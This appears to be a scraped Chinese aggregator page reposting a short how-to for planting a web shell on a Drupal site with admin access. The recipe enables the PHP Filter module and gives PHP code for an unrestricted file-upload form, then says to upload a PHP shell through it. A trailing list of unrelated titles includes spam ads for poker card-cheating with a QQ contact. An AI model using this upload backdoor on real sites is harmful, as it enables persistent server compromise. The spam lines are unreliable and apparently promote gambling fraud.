Drupal - upload shell with admin privilege
来源:互联网 发布:bpm开源软件 编辑:程序博客网 时间:2024/06/06 17:02
- login drupal with admin username and password.
- enable PHP Filter
- Add content with PHP Code
<?phpif(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"<center><b>Done ==> $userfile_name</b></center>"; }}else{echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; }?>Enable PHP Filter (Modules Settings), and save it.
Add a new article with PHP Code format, and POST it.
Go to Drupal home page, and you can find upload page.
Upload your php shell.
0 0
- Drupal - upload shell with admin privilege
- drupal upload模块中文乱码问题
- File Upload with ASP.NET
- Secure File Upload with PHP
- Html5 File Upload with Progress
- Image / file upload with CodeIgniter
- Multipart Upload with HttpClient 4
- with admin option、with grant option区别
- with admin option&with grant option
- with admin option 与 with grant option
- with admin option & with grant option
- could not get debug privilege are you admin?(3dmax破解失败)
- ORA-01035: only available to users with RESTRICTED SESSION privilege
- create an process with administrator privilege from service in Vista
- ASP.NET File Upload with Progress Bar
- Node(20) File Upload with formidable module
- Finding Local Admin with the Veil-Framework
- [Python]Use Flask-Admin with PostgreSQL
- Druid是什么
- java对redis的基本操作
- lightoj1079(数学概率与期望)
- 普通扑克怎么控牌◥▲【在线演示QQ:194714506】
- Java乔晓松-Android SD卡路径问题以及如何获取SDCard内存大小
- Drupal - upload shell with admin privilege
- js获取电子秤串口数据
- 增强学习(二)----- 马尔可夫决策过程MDP
- 普通扑克怎样控牌ω◥【在线演示QQ:194714506】
- 通过Gradle来下载依赖的jar包
- 普通扑克控牌绝技╳︻【在线演示QQ:194714506】
- win7下通过easyBCD引导安装Ubuntu14.04(补充完善版)
- Java.lang.UnsatisfiedLinkError android studio集成Jpush极光推送
- hdu 2057 a + b again
